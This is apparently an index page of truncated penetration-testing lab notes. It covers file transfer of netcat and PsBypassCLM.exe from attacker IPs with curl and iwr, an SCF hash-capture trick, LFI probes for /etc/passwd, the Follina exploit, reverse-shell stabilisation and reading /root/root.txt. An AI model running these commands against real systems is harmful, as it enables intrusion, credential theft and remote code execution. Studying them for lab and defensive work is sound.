Upload Netcat execution for windows. From victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create with impacket the se...

iwr (Invoke-Web-Request) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute this commands to create wget.ps1 on victim m...

Identify the hash type If you want to know the type of a password’s hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will throw the type: Hash-mode was not...

SCF Attack SCF Attack First we need to write a file inside the share with writting permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Simple LFI If an input is accepted on a URL parameter we can try to access any system file and check if whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...

Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

The following exploit Follina works pretty well, all you need to do is clone the repository and execute it as follows, the “-c” is the command to execute, it can be a cmd or a powershell intruction...

Python Once we get access to the victim machine we proceed to stabilize the shell: First we need to Ctrl + Z the shell as follows: tom@epsilon:/var/www/app$ ^Z zsh: suspended nc -lvnp 1235 Then t...

Read a file Create a file test.js with content: const fs = require('fs'); fs.readFile('/root/root.txt', 'utf-8', (err, data) =>{ if (err) throw err; console.log(data); }); To e...